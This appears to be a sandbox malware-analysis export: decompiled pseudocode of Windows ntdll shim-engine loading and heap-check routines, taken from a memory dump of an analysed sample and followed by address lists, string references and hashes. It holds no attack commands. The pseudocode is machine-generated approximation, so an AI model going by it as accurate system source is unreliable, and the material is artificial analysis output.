                                                                                                                                                                                      				if(_v804 != 0) {
                                                                                                                                                                                      					E1D86E7E0( &_v792, _v868);
                                                                                                                                                                                      				}
                                                                                                                                                                                      				_t112 = _t103;
                                                                                                                                                                                      				if(_t103 < 0) {
                                                                                                                                                                                      					_t61 =  *0x1d9337c0; // 0x0
                                                                                                                                                                                      					__eflags = _t61 & 0x00000003;
                                                                                                                                                                                      					if((_t61 & 0x00000003) != 0) {
                                                                                                                                                                                      						E1D8BE692("minkernel\\ntdll\\ldrinit.c", 0xa48, "LdrpInitShimEngine", 0, "Loading the shim engine DLL failed with status 0x%08lx\n", _t103);
                                                                                                                                                                                      						_t61 =  *0x1d9337c0; // 0x0
                                                                                                                                                                                      						_t108 = _t108 + 0x18;
                                                                                                                                                                                      					}
                                                                                                                                                                                      					__eflags = _t61 & 0x00000010;
                                                                                                                                                                                      					goto L15;
                                                                                                                                                                                      				} else {
                                                                                                                                                                                      					 *( *((intOrPtr*)(_t108 + 0xc)) + 0x34) =  *( *((intOrPtr*)(_t108 + 0xc)) + 0x34) | 0x00000100;
                                                                                                                                                                                      					 *0x1d935d64 =  *((intOrPtr*)( *((intOrPtr*)(_t108 + 0xc)) + 0x18));
                                                                                                                                                                                      					E1D877DF6( *((intOrPtr*)(_t108 + 0xc)));
                                                                                                                                                                                      					E1D85D3E1(0,  *((intOrPtr*)(_t108 + 0xc)), _t103);
                                                                                                                                                                                      					_t67 = E1D836868( *((intOrPtr*)(_t108 + 0xc)), _t96, _t112);
                                                                                                                                                                                      					if(_t67 < 0) {
                                                                                                                                                                                      						_t85 =  *0x1d9337c0; // 0x0
                                                                                                                                                                                      						__eflags = _t85 & 0x00000003;
                                                                                                                                                                                      						if((_t85 & 0x00000003) == 0) {
                                                                                                                                                                                      							goto L12;
                                                                                                                                                                                      						}
                                                                                                                                                                                      						_push(_t67);
                                                                                                                                                                                      						_push("Getting the shim engine exports failed with status 0x%08lx\n");
                                                                                                                                                                                      						_push(0);
                                                                                                                                                                                      						_push("LdrpInitShimEngine");
                                                                                                                                                                                      						_push(0xa56);
                                                                                                                                                                                      						goto L11;
                                                                                                                                                                                      					}
                                                                                                                                                                                      					_t104 =  *0x1d939208; // 0x0
                                                                                                                                                                                      					_v872 = _t108 + 0x178;
                                                                                                                                                                                      					_v876 = 0x2000000;
                                                                                                                                                                                      					_t96 =  *0x7ffe0330;
                                                                                                                                                                                      					_t71 =  *0x1d935b24; // 0x19a2cf0
                                                                                                                                                                                      					asm("ror esi, cl");
                                                                                                                                                                                      					 *0x1d9391e0( &_v876, _t71 + 0x24, _t99, 0x20);
                                                                                                                                                                                      					if( *(_t104 ^  *0x7ffe0330)() >= 0) {
                                                                                                                                                                                      						E1D836565( *((intOrPtr*)(_t108 + 0x14)));
                                                                                                                                                                                      						if( *((intOrPtr*)(_t108 + 0x14)) != _t108 + 0x178) {
                                                                                                                                                                                      							E1D853BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0,  *((intOrPtr*)(_t108 + 0x14)));
                                                                                                                                                                                      						}
                                                                                                                                                                                      					}
                                                                                                                                                                                      					goto L6;
                                                                                                                                                                                      				}
                                                                                                                                                                                      			}









































                                                                                                                                                                                      0x1d836415
                                                                                                                                                                                      0x1d836422
                                                                                                                                                                                      0x1d83642e
                                                                                                                                                                                      0x1d83642f
                                                                                                                                                                                      0x1d836434
                                                                                                                                                                                      0x1d83643a
                                                                                                                                                                                      0x1d83643b
                                                                                                                                                                                      0x1d836440
                                                                                                                                                                                      0x1d836446
                                                                                                                                                                                      0x1d83644e
                                                                                                                                                                                      0x1d836458
                                                                                                                                                                                      0x1d836460
                                                                                                                                                                                      0x1d836465
                                                                                                                                                                                      0x1d83646c
                                                                                                                                                                                      0x1d899770
                                                                                                                                                                                      0x1d899776
                                                                                                                                                                                      0x1d899779
                                                                                                                                                                                      0x1d8997b3
                                                                                                                                                                                      0x1d8997b3
                                                                                                                                                                                      0x1d8997dd
                                                                                                                                                                                      0x1d8997dd
                                                                                                                                                                                      0x1d8997e3
                                                                                                                                                                                      0x1d8997e3
                                                                                                                                                                                      0x1d836542
                                                                                                                                                                                      0x1d836542
                                                                                                                                                                                      0x1d83654a
                                                                                                                                                                                      0x1d89982b
                                                                                                                                                                                      0x1d89982b
                                                                                                                                                                                      0x1d836557
                                                                                                                                                                                      0x1d836558
                                                                                                                                                                                      0x1d836559
                                                                                                                                                                                      0x1d836564
                                                                                                                                                                                      0x1d836564
                                                                                                                                                                                      0x1d89977b
                                                                                                                                                                                      0x1d89977c
                                                                                                                                                                                      0x1d899781
                                                                                                                                                                                      0x1d899783
                                                                                                                                                                                      0x1d899788
                                                                                                                                                                                      0x1d8997a0
                                                                                                                                                                                      0x1d8997a0
                                                                                                                                                                                      0x1d8997a5
                                                                                                                                                                                      0x1d8997aa
                                                                                                                                                                                      0x1d8997b0
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x1d8997b0
                                                                                                                                                                                      0x1d83647e
                                                                                                                                                                                      0x1d83648b
                                                                                                                                                                                      0x1d836498
                                                                                                                                                                                      0x1d83649e
                                                                                                                                                                                      0x1d8997ed
                                                                                                                                                                                      0x1d8997ed
                                                                                                                                                                                      0x1d8364a4
                                                                                                                                                                                      0x1d8364a6
                                                                                                                                                                                      0x1d8997f7
                                                                                                                                                                                      0x1d8997fc
                                                                                                                                                                                      0x1d8997fe
                                                                                                                                                                                      0x1d8997ce
                                                                                                                                                                                      0x1d8997d3
                                                                                                                                                                                      0x1d8997d8
                                                                                                                                                                                      0x1d8997d8
                                                                                                                                                                                      0x1d8997db
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x1d8364ac
                                                                                                                                                                                      0x1d8364b0
                                                                                                                                                                                      0x1d8364be
                                                                                                                                                                                      0x1d8364c3
                                                                                                                                                                                      0x1d8364cc
                                                                                                                                                                                      0x1d8364d1
                                                                                                                                                                                      0x1d8364d8
                                                                                                                                                                                      0x1d899802
                                                                                                                                                                                      0x1d899808
                                                                                                                                                                                      0x1d89980b
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x1d89978f
                                                                                                                                                                                      0x1d899790
                                                                                                                                                                                      0x1d899795
                                                                                                                                                                                      0x1d899796
                                                                                                                                                                                      0x1d89979b
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x1d89979b
                                                                                                                                                                                      0x1d8364de
                                                                                                                                                                                      0x1d8364eb
                                                                                                                                                                                      0x1d8364f1
                                                                                                                                                                                      0x1d8364f9
                                                                                                                                                                                      0x1d836507
                                                                                                                                                                                      0x1d836510
                                                                                                                                                                                      0x1d83651c
                                                                                                                                                                                      0x1d836526
                                                                                                                                                                                      0x1d83652c
                                                                                                                                                                                      0x1d83653c
                                                                                                                                                                                      0x1d89981d
                                                                                                                                                                                      0x1d89981d
                                                                                                                                                                                      0x1d83653c
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x1d836526

                                                                                                                                                                                      APIs
                                                                                                                                                                                      • RtlDebugPrintTimes.NTDLL ref: 1D83651C
                                                                                                                                                                                        • Part of subcall function 1D836565: RtlDebugPrintTimes.NTDLL ref: 1D836614
                                                                                                                                                                                        • Part of subcall function 1D836565: RtlDebugPrintTimes.NTDLL ref: 1D83665F
                                                                                                                                                                                      Strings
                                                                                                                                                                                      • LdrpInitShimEngine, xrefs: 1D899783, 1D899796, 1D8997BF
                                                                                                                                                                                      • Building shim engine DLL system32 filename failed with status 0x%08lx, xrefs: 1D89977C
                                                                                                                                                                                      • Loading the shim engine DLL failed with status 0x%08lx, xrefs: 1D8997B9
                                                                                                                                                                                      • Getting the shim engine exports failed with status 0x%08lx, xrefs: 1D899790
                                                                                                                                                                                      • apphelp.dll, xrefs: 1D836446
                                                                                                                                                                                      • minkernel\ntdll\ldrinit.c, xrefs: 1D8997A0, 1D8997C9
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000004.00000002.2242251586.000000001D810000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D810000, based on PE: true
                                                                                                                                                                                      • Associated: 00000004.00000002.2244516243.000000001D939000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.2244545671.000000001D93D000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_1d810000_Aposporogony.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: DebugPrintTimes
                                                                                                                                                                                      • String ID: Building shim engine DLL system32 filename failed with status 0x%08lx$Getting the shim engine exports failed with status 0x%08lx$LdrpInitShimEngine$Loading the shim engine DLL failed with status 0x%08lx$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                                                                                                                                                      • API String ID: 3446177414-204845295
                                                                                                                                                                                      • Opcode ID: 30d5a3a2f5b8e60b86e4b2d5c52ac990a41b8739c3776a8121ee39c42fa26c48
                                                                                                                                                                                      • Instruction ID: 9a29ac6535d5d90e8f420d16fccfb4d1b4821a407f7debebe8952a98adafe156
                                                                                                                                                                                      • Opcode Fuzzy Hash: 30d5a3a2f5b8e60b86e4b2d5c52ac990a41b8739c3776a8121ee39c42fa26c48
                                                                                                                                                                                      • Instruction Fuzzy Hash: F251BFB5608305AFD315DF28C881BAB77E8FF84644F41491DF6999B2A1EA30E944CB93
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      APIs
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000004.00000002.2242251586.000000001D810000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D810000, based on PE: true
                                                                                                                                                                                      • Associated: 00000004.00000002.2244516243.000000001D939000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.2244545671.000000001D93D000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_1d810000_Aposporogony.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: DebugPrintTimes
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 3446177414-0
                                                                                                                                                                                      • Opcode ID: 902105a04ec4c1653553b0adae691786f84a09850c9e858bd25545e6b8f79e94
                                                                                                                                                                                      • Instruction ID: 0344a89270bfa36a8889ca875d61a9ea34f159e89692a1d4d87aed359151c0ff
                                                                                                                                                                                      • Opcode Fuzzy Hash: 902105a04ec4c1653553b0adae691786f84a09850c9e858bd25545e6b8f79e94
                                                                                                                                                                                      • Instruction Fuzzy Hash: 66A19075A0831A8FC706CE68C894A2BB7E5FF88760F05456DE946DB351E734EC42CB92
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      C-Code - Quality: 59%
                                                                                                                                                                                      			E1D836565(intOrPtr* __ecx) {
                                                                                                                                                                                      				signed int _v8;
                                                                                                                                                                                      				char _v16;
                                                                                                                                                                                      				char _v92;
                                                                                                                                                                                      				char _v93;
                                                                                                                                                                                      				char _v100;
                                                                                                                                                                                      				signed short _v106;
                                                                                                                                                                                      				char _v108;
                                                                                                                                                                                      				void* __ebx;
                                                                                                                                                                                      				void* __edi;
                                                                                                                                                                                      				void* __esi;
                                                                                                                                                                                      				void* __ebp;
                                                                                                                                                                                      				intOrPtr* _t56;
                                                                                                                                                                                      				signed char _t67;
                                                                                                                                                                                      				intOrPtr _t76;
                                                                                                                                                                                      				signed char _t81;
                                                                                                                                                                                      				signed int _t86;
                                                                                                                                                                                      				signed int _t87;
                                                                                                                                                                                      				char _t88;
                                                                                                                                                                                      				intOrPtr _t103;
                                                                                                                                                                                      				signed int _t106;
                                                                                                                                                                                      				intOrPtr* _t110;
                                                                                                                                                                                      				signed int _t111;
                                                                                                                                                                                      				signed int _t112;
                                                                                                                                                                                      				intOrPtr _t113;
                                                                                                                                                                                      				signed int _t114;
                                                                                                                                                                                      				intOrPtr* _t116;
                                                                                                                                                                                      				signed int _t117;
                                                                                                                                                                                      				void* _t118;
                                                                                                                                                                                      
                                                                                                                                                                                      				_v8 =  *0x1d93b370 ^ _t117;
                                                                                                                                                                                      				_v93 = 1;
                                                                                                                                                                                      				_t110 = __ecx;
                                                                                                                                                                                      				E1D85E8A6(0, 0x4001,  &_v92);
                                                                                                                                                                                      				_t106 =  *0x7ffe0330;
                                                                                                                                                                                      				_t86 =  *0x1d939200; // 0x0
                                                                                                                                                                                      				_t113 = 0x20;
                                                                                                                                                                                      				 *0x1d9365f8 = 1;
                                                                                                                                                                                      				_t92 = _t113 - (_t106 & 0x0000001f);
                                                                                                                                                                                      				asm("ror ebx, cl");
                                                                                                                                                                                      				_t87 = _t86 ^ _t106;
                                                                                                                                                                                      				if( *__ecx == 0) {
                                                                                                                                                                                      					L8:
                                                                                                                                                                                      					_t88 = _v93;
                                                                                                                                                                                      					L9:
                                                                                                                                                                                      					if(_v16 != 0) {
                                                                                                                                                                                      						E1D86E7E0(_t92, _v92);
                                                                                                                                                                                      					}
                                                                                                                                                                                      					_t114 =  *0x1d939210; // 0x0
                                                                                                                                                                                      					asm("ror esi, cl");
                                                                                                                                                                                      					 *0x1d9391e0();
                                                                                                                                                                                      					 *(_t114 ^  *0x7ffe0330)();
                                                                                                                                                                                      					_t108 =  *0x7ffe0330;
                                                                                                                                                                                      					_t111 =  *0x1d939218; // 0x0
                                                                                                                                                                                      					_push(0x20);
                                                                                                                                                                                      					asm("ror edi, cl");
                                                                                                                                                                                      					_t112 = _t111 ^  *0x7ffe0330;
                                                                                                                                                                                      					E1D84FED0(0x1d9332d8);
                                                                                                                                                                                      					_t98 = 0x1d935d8c;
                                                                                                                                                                                      					if( *0x1d9365f0 != 0) {
                                                                                                                                                                                      						_t56 =  *0x1d935d8c; // 0x19a2cf0
                                                                                                                                                                                      						while(1) {
                                                                                                                                                                                      							__eflags = _t56 - _t98;
                                                                                                                                                                                      							if(_t56 == _t98) {
                                                                                                                                                                                      								break;
                                                                                                                                                                                      							}
                                                                                                                                                                                      							_v100 = _t56;
                                                                                                                                                                                      							_t39 = _t56 + 0x35;
                                                                                                                                                                                      							 *_t39 =  *(_t56 + 0x35) & 0x000000f7;
                                                                                                                                                                                      							__eflags =  *_t39;
                                                                                                                                                                                      							_t56 =  *_t56;
                                                                                                                                                                                      						}
                                                                                                                                                                                      						goto L11;
                                                                                                                                                                                      					} else {
                                                                                                                                                                                      						L11:
                                                                                                                                                                                      						_t116 =  *0x1d935d8c; // 0x19a2cf0
                                                                                                                                                                                      						if( *0x1d9365f4 < 2) {
                                                                                                                                                                                      							_t116 =  *_t116;
                                                                                                                                                                                      						}
                                                                                                                                                                                      						if(_t116 == _t98) {
                                                                                                                                                                                      							L15:
                                                                                                                                                                                      							 *0x1d9365f0 = 1;
                                                                                                                                                                                      							 *0x1d9365f8 = 0;
                                                                                                                                                                                      							E1D84E740(_t98);
                                                                                                                                                                                      							E1D83676F(_t98);
                                                                                                                                                                                      							return E1D884B50(_t88, _t88, _v8 ^ _t117, _t108, _t112, _t116, 0x1d9332d8);
                                                                                                                                                                                      						} else {
                                                                                                                                                                                      							do {
                                                                                                                                                                                      								_v100 = _t116;
                                                                                                                                                                                      								_t108 = _t112;
                                                                                                                                                                                      								_t24 = _t116 + 0x50; // 0x19a2cb8
                                                                                                                                                                                      								_t98 =  *_t24;
                                                                                                                                                                                      								E1D836704( *_t24, _t112);
                                                                                                                                                                                      								_t116 =  *_t116;
                                                                                                                                                                                      							} while (_t116 != 0x1d935d8c);
                                                                                                                                                                                      							goto L15;
                                                                                                                                                                                      						}
                                                                                                                                                                                      					}
                                                                                                                                                                                      				} else {
                                                                                                                                                                                      					goto L1;
                                                                                                                                                                                      				}
                                                                                                                                                                                      				do {
                                                                                                                                                                                      					L1:
                                                                                                                                                                                      					E1D885050(_t92,  &_v108, _t110);
                                                                                                                                                                                      					_t92 = E1D836B45( &_v108,  &_v92, 1,  &_v100);
                                                                                                                                                                                      					if(_t92 < 0) {
                                                                                                                                                                                      						_t67 =  *0x1d9337c0; // 0x0
                                                                                                                                                                                      						__eflags = _t67 & 0x00000003;
                                                                                                                                                                                      						if((_t67 & 0x00000003) != 0) {
                                                                                                                                                                                      							_push(_t92);
                                                                                                                                                                                      							E1D8BE692("minkernel\\ntdll\\ldrinit.c", 0x8ef, "LdrpLoadShimEngine", 0, "Loading the shim DLL \"%wZ\" failed with status 0x%08lx\n",  &_v108);
                                                                                                                                                                                      							_t67 =  *0x1d9337c0; // 0x0
                                                                                                                                                                                      							_t118 = _t118 + 0x1c;
                                                                                                                                                                                      						}
                                                                                                                                                                                      						__eflags = _t67 & 0x00000010;
                                                                                                                                                                                      						if((_t67 & 0x00000010) != 0) {
                                                                                                                                                                                      							asm("int3");
                                                                                                                                                                                      						}
                                                                                                                                                                                      						_v93 = 0;
                                                                                                                                                                                      						goto L6;
                                                                                                                                                                                      					}
                                                                                                                                                                                      					 *(_v100 + 0x34) =  *(_v100 + 0x34) | 0x00000100;
                                                                                                                                                                                      					E1D877DF6(_v100);
                                                                                                                                                                                      					_t76 = _v100;
                                                                                                                                                                                      					_t103 =  *((intOrPtr*)(_t76 + 0x50));
                                                                                                                                                                                      					_t122 =  *((intOrPtr*)(_t103 + 0x20)) - 7;
                                                                                                                                                                                      					if( *((intOrPtr*)(_t103 + 0x20)) != 7) {
                                                                                                                                                                                      						L5:
                                                                                                                                                                                      						 *0x1d9391e0( *((intOrPtr*)(_t76 + 0x18)));
                                                                                                                                                                                      						 *_t87();
                                                                                                                                                                                      						_t92 = _v100;
                                                                                                                                                                                      						E1D85D3E1(_t87, _v100, _t113);
                                                                                                                                                                                      						goto L6;
                                                                                                                                                                                      					}
                                                                                                                                                                                      					_t113 = E1D8616EE(_t87, _t103, _t110, _t113, _t122);
                                                                                                                                                                                      					if(_t113 < 0) {
                                                                                                                                                                                      						_t81 =  *0x1d9337c0; // 0x0
                                                                                                                                                                                      						_t88 = 0;
                                                                                                                                                                                      						__eflags = _t81 & 0x00000003;
                                                                                                                                                                                      						if((_t81 & 0x00000003) != 0) {
                                                                                                                                                                                      							_push(_t113);
                                                                                                                                                                                      							E1D8BE692("minkernel\\ntdll\\ldrinit.c", 0x909, "LdrpLoadShimEngine", 0, "Initializing the shim DLL \"%wZ\" failed with status 0x%08lx\n",  &_v108);
                                                                                                                                                                                      							_t81 =  *0x1d9337c0; // 0x0
                                                                                                                                                                                      						}
                                                                                                                                                                                      						__eflags = _t81 & 0x00000010;
                                                                                                                                                                                      						if((_t81 & 0x00000010) != 0) {
                                                                                                                                                                                      							asm("int3");
                                                                                                                                                                                      						}
                                                                                                                                                                                      						_t92 = _t113;
                                                                                                                                                                                      						E1D8C1D5E(_t113);
                                                                                                                                                                                      						_push(_t113);
                                                                                                                                                                                      						_push(0xffffffff);
                                                                                                                                                                                      						E1D882C70();
                                                                                                                                                                                      						_t113 = 0x20;
                                                                                                                                                                                      						goto L9;
                                                                                                                                                                                      					}
                                                                                                                                                                                      					_t76 = _v100;
                                                                                                                                                                                      					goto L5;
                                                                                                                                                                                      					L6:
                                                                                                                                                                                      					_t110 = _t110 + ((_v106 & 0x0000ffff) >> 1) * 2;
                                                                                                                                                                                      				} while ( *_t110 != 0);
                                                                                                                                                                                      				_t113 = 0x20;
                                                                                                                                                                                      				goto L8;
                                                                                                                                                                                      			}































                                                                                                                                                                                      0x1d836574
                                                                                                                                                                                      0x1d83657d
                                                                                                                                                                                      0x1d836581
                                                                                                                                                                                      0x1d83658b
                                                                                                                                                                                      0x1d836590
                                                                                                                                                                                      0x1d836598
                                                                                                                                                                                      0x1d8365a3
                                                                                                                                                                                      0x1d8365a6
                                                                                                                                                                                      0x1d8365ad
                                                                                                                                                                                      0x1d8365b1
                                                                                                                                                                                      0x1d8365b3
                                                                                                                                                                                      0x1d8365b8
                                                                                                                                                                                      0x1d836637
                                                                                                                                                                                      0x1d836637
                                                                                                                                                                                      0x1d83663a
                                                                                                                                                                                      0x1d83663e
                                                                                                                                                                                      0x1d8366fa
                                                                                                                                                                                      0x1d8366fa
                                                                                                                                                                                      0x1d83664c
                                                                                                                                                                                      0x1d836659
                                                                                                                                                                                      0x1d83665f
                                                                                                                                                                                      0x1d836665
                                                                                                                                                                                      0x1d836667
                                                                                                                                                                                      0x1d83666f
                                                                                                                                                                                      0x1d836678
                                                                                                                                                                                      0x1d83667d
                                                                                                                                                                                      0x1d836684
                                                                                                                                                                                      0x1d836686
                                                                                                                                                                                      0x1d836692
                                                                                                                                                                                      0x1d836697
                                                                                                                                                                                      0x1d8998c3
                                                                                                                                                                                      0x1d8998d3
                                                                                                                                                                                      0x1d8998d3
                                                                                                                                                                                      0x1d8998d5
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x1d8998ca
                                                                                                                                                                                      0x1d8998cd
                                                                                                                                                                                      0x1d8998cd
                                                                                                                                                                                      0x1d8998cd
                                                                                                                                                                                      0x1d8998d1
                                                                                                                                                                                      0x1d8998d1
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x1d83669d
                                                                                                                                                                                      0x1d83669d
                                                                                                                                                                                      0x1d8366a4
                                                                                                                                                                                      0x1d8366aa
                                                                                                                                                                                      0x1d8366ac
                                                                                                                                                                                      0x1d8366ac
                                                                                                                                                                                      0x1d8366b0
                                                                                                                                                                                      0x1d8366c9
                                                                                                                                                                                      0x1d8366cb
                                                                                                                                                                                      0x1d8366d7
                                                                                                                                                                                      0x1d8366dc
                                                                                                                                                                                      0x1d8366e1
                                                                                                                                                                                      0x1d8366f6
                                                                                                                                                                                      0x1d8366b2
                                                                                                                                                                                      0x1d8366b2
                                                                                                                                                                                      0x1d8366b2
                                                                                                                                                                                      0x1d8366b5
                                                                                                                                                                                      0x1d8366b7
                                                                                                                                                                                      0x1d8366b7
                                                                                                                                                                                      0x1d8366ba
                                                                                                                                                                                      0x1d8366bf
                                                                                                                                                                                      0x1d8366c1
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x1d8366b2
                                                                                                                                                                                      0x1d8366b0
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x1d8365ba
                                                                                                                                                                                      0x1d8365ba
                                                                                                                                                                                      0x1d8365bf
                                                                                                                                                                                      0x1d8365d5
                                                                                                                                                                                      0x1d8365d9
                                                                                                                                                                                      0x1d899835
                                                                                                                                                                                      0x1d89983a
                                                                                                                                                                                      0x1d89983c
                                                                                                                                                                                      0x1d89983e
                                                                                                                                                                                      0x1d899859
                                                                                                                                                                                      0x1d89985e
                                                                                                                                                                                      0x1d899863
                                                                                                                                                                                      0x1d899863
                                                                                                                                                                                      0x1d899866
                                                                                                                                                                                      0x1d899868
                                                                                                                                                                                      0x1d89986a
                                                                                                                                                                                      0x1d89986a
                                                                                                                                                                                      0x1d89986d
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x1d89986d
                                                                                                                                                                                      0x1d8365e2
                                                                                                                                                                                      0x1d8365ec
                                                                                                                                                                                      0x1d8365f1
                                                                                                                                                                                      0x1d8365f4
                                                                                                                                                                                      0x1d8365f7
                                                                                                                                                                                      0x1d8365fb
                                                                                                                                                                                      0x1d83660f
                                                                                                                                                                                      0x1d836614
                                                                                                                                                                                      0x1d83661a
                                                                                                                                                                                      0x1d83661c
                                                                                                                                                                                      0x1d83661f
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x1d83661f
                                                                                                                                                                                      0x1d836602
                                                                                                                                                                                      0x1d836606
                                                                                                                                                                                      0x1d899875
                                                                                                                                                                                      0x1d89987a
                                                                                                                                                                                      0x1d89987c
                                                                                                                                                                                      0x1d89987e
                                                                                                                                                                                      0x1d899880
                                                                                                                                                                                      0x1d89989a
                                                                                                                                                                                      0x1d89989f
                                                                                                                                                                                      0x1d8998a4
                                                                                                                                                                                      0x1d8998a7
                                                                                                                                                                                      0x1d8998a9
                                                                                                                                                                                      0x1d8998ab
                                                                                                                                                                                      0x1d8998ab
                                                                                                                                                                                      0x1d8998ac
                                                                                                                                                                                      0x1d8998ae
                                                                                                                                                                                      0x1d8998b3
                                                                                                                                                                                      0x1d8998b4
                                                                                                                                                                                      0x1d8998b6
                                                                                                                                                                                      0x1d8998bd
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x1d8998bd
                                                                                                                                                                                      0x1d83660c
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x1d836624
                                                                                                                                                                                      0x1d83662a
                                                                                                                                                                                      0x1d83662f
                                                                                                                                                                                      0x1d836636
                                                                                                                                                                                      0x00000000

                                                                                                                                                                                      APIs
                                                                                                                                                                                      Strings
                                                                                                                                                                                      • Loading the shim DLL "%wZ" failed with status 0x%08lx, xrefs: 1D899843
                                                                                                                                                                                      • LdrpLoadShimEngine, xrefs: 1D89984A, 1D89988B
                                                                                                                                                                                      • Initializing the shim DLL "%wZ" failed with status 0x%08lx, xrefs: 1D899885
                                                                                                                                                                                      • minkernel\ntdll\ldrinit.c, xrefs: 1D899854, 1D899895
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000004.00000002.2242251586.000000001D810000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D810000, based on PE: true
                                                                                                                                                                                      • Associated: 00000004.00000002.2244516243.000000001D939000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.2244545671.000000001D93D000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_1d810000_Aposporogony.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: DebugPrintTimes
                                                                                                                                                                                      • String ID: Initializing the shim DLL "%wZ" failed with status 0x%08lx$LdrpLoadShimEngine$Loading the shim DLL "%wZ" failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
                                                                                                                                                                                      • API String ID: 3446177414-3589223738
                                                                                                                                                                                      • Opcode ID: 59ee205f6e319215a0a5ca607dce93b62b7673775e207f2831fb9d4621ce3b71
                                                                                                                                                                                      • Instruction ID: b292328dcba4923c75f5e03fddb837e178e8effc3cb92dd927a5df70a8ace636
                                                                                                                                                                                      • Opcode Fuzzy Hash: 59ee205f6e319215a0a5ca607dce93b62b7673775e207f2831fb9d4621ce3b71
                                                                                                                                                                                      • Instruction Fuzzy Hash: 0A513539A08358BFCB04DBBCCC95BAD77B6AB44348F050129E555AF2A6DB70AC40C792
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      C-Code - Quality: 19%
                                                                                                                                                                                      			E1D86DA20(void* __ecx, intOrPtr _a4) {
                                                                                                                                                                                      				intOrPtr _v8;
                                                                                                                                                                                      				signed int _v12;
                                                                                                                                                                                      				signed int _v16;
                                                                                                                                                                                      				intOrPtr* _t44;
                                                                                                                                                                                      				char* _t45;
                                                                                                                                                                                      				void* _t65;
                                                                                                                                                                                      				intOrPtr _t72;
                                                                                                                                                                                      				signed int _t73;
                                                                                                                                                                                      				intOrPtr _t74;
                                                                                                                                                                                      				void* _t82;
                                                                                                                                                                                      				signed char* _t87;
                                                                                                                                                                                      				signed char _t90;
                                                                                                                                                                                      				intOrPtr _t92;
                                                                                                                                                                                      				intOrPtr _t93;
                                                                                                                                                                                      				intOrPtr* _t94;
                                                                                                                                                                                      				signed int* _t95;
                                                                                                                                                                                      
                                                                                                                                                                                      				_t93 = _a4;
                                                                                                                                                                                      				if( *((intOrPtr*)(_t93 + 8)) == 0xddeeddee) {
                                                                                                                                                                                      					E1D909335(_t93, 0, __ecx);
                                                                                                                                                                                      					L6:
                                                                                                                                                                                      					_t44 =  *((intOrPtr*)( *[fs:0x30] + 0x50));
                                                                                                                                                                                      					if(_t44 != 0) {
                                                                                                                                                                                      						if( *_t44 == 0) {
                                                                                                                                                                                      							goto L7;
                                                                                                                                                                                      						}
                                                                                                                                                                                      						_t45 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
                                                                                                                                                                                      						L8:
                                                                                                                                                                                      						if( *_t45 != 0) {
                                                                                                                                                                                      							if(( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
                                                                                                                                                                                      								E1D8FF717(_t93);
                                                                                                                                                                                      							}
                                                                                                                                                                                      						}
                                                                                                                                                                                      						return 1;
                                                                                                                                                                                      					}
                                                                                                                                                                                      					L7:
                                                                                                                                                                                      					_t45 = 0x7ffe0380;
                                                                                                                                                                                      					goto L8;
                                                                                                                                                                                      				}
                                                                                                                                                                                      				if(( *(_t93 + 0x44) & 0x01000000) != 0) {
                                                                                                                                                                                      					_t94 =  *0x1d93376c; // 0x0
                                                                                                                                                                                      					 *0x1d9391e0(_t93);
                                                                                                                                                                                      					return  *_t94();
                                                                                                                                                                                      				}
                                                                                                                                                                                      				if( *((intOrPtr*)(_t93 + 0x60)) != 0xeeffeeff) {
                                                                                                                                                                                      					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                                                                                                                                                                                      						_push("HEAP: ");
                                                                                                                                                                                      						E1D83B910();
                                                                                                                                                                                      					} else {
                                                                                                                                                                                      						E1D83B910("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                                                                                                                                                                      					}
                                                                                                                                                                                      					E1D83B910("Invalid heap signature for heap at %p", _t93);
